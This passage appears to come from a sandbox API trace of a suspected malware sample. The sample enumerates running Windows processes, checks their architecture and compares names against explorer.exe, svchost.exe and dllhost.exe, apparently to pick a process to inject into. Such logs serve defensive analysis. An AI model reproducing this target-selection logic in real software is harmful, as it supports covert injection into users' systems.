[0239.653] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0239.653] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0239.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0239.654] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0239.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0239.654] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0239.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0239.655] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0239.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0239.655] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0239.656] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0239.656] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0239.657] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0239.657] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0239.658] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0239.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0239.658] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0239.659] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0239.659] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0239.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0239.660] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.660] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.660] CloseHandle (hObject=0xec) returned 1 [0239.660] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0239.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0239.660] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0239.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0239.661] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.661] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.661] CloseHandle (hObject=0xec) returned 1 [0239.661] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0239.661] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0239.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0239.662] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0239.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0239.662] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.662] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.662] CloseHandle (hObject=0xec) returned 1 [0239.663] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0239.663] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0239.663] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0239.663] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0239.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0239.663] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.663] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.663] CloseHandle (hObject=0xec) returned 1 [0239.663] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0239.663] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0239.663] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0239.663] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0239.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0239.664] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.664] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.664] CloseHandle (hObject=0xec) returned 1 [0239.664] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0239.664] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0239.664] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0239.664] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0239.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0239.665] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.665] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.665] CloseHandle (hObject=0xec) returned 1 [0239.665] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0239.665] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0239.665] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0239.665] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0239.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0239.665] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.665] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.665] CloseHandle (hObject=0xec) returned 1 [0239.665] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0239.665] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0239.665] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0239.665] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0239.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0239.666] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.666] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.666] CloseHandle (hObject=0xec) returned 1 [0239.666] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0239.666] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0239.666] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0239.666] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0239.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0239.667] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.667] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.667] CloseHandle (hObject=0xec) returned 1 [0239.667] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0239.667] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0239.667] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0239.667] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0239.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0239.667] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.667] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.667] CloseHandle (hObject=0xec) returned 1 [0239.667] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0239.667] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0239.667] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0239.667] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0239.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0239.668] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.668] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.668] CloseHandle (hObject=0xec) returned 1 [0239.668] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0239.668] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0239.668] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0239.668] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0239.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0239.669] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.669] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.669] CloseHandle (hObject=0xec) returned 1 [0239.669] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0239.669] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0239.669] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0239.669] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0239.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0239.669] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.669] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.669] CloseHandle (hObject=0xec) returned 1 [0239.669] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0239.669] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0239.669] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0239.669] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0239.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0239.670] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.670] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.670] CloseHandle (hObject=0xec) returned 1 [0239.670] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0239.670] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0239.670] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0239.670] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0239.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0239.671] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.671] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.671] CloseHandle (hObject=0xec) returned 1 [0239.671] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0239.671] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0239.671] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0239.671] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0239.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0239.671] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.671] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.671] CloseHandle (hObject=0xec) returned 1 [0239.671] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0239.672] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0239.672] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0239.672] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0239.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0239.672] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.672] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.672] CloseHandle (hObject=0xec) returned 1 [0239.672] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0239.672] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0239.672] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0239.672] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0239.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0239.673] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.673] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.673] CloseHandle (hObject=0xec) returned 1 [0239.673] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0239.673] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0239.673] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0239.673] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0239.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0239.673] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.673] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.674] CloseHandle (hObject=0xec) returned 1 [0239.674] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0239.674] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0239.674] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0239.674] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0239.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0239.674] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.674] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.674] CloseHandle (hObject=0xec) returned 1 [0239.674] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0239.674] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0239.674] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0239.674] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0239.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0239.675] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.675] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.675] CloseHandle (hObject=0xec) returned 1 [0239.675] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0239.675] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0239.675] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0239.675] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0239.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0239.676] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.676] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.676] CloseHandle (hObject=0xec) returned 1 [0239.676] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0239.676] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0239.676] lstrcmpiA (lpString1="doctrine alcohol.exe", 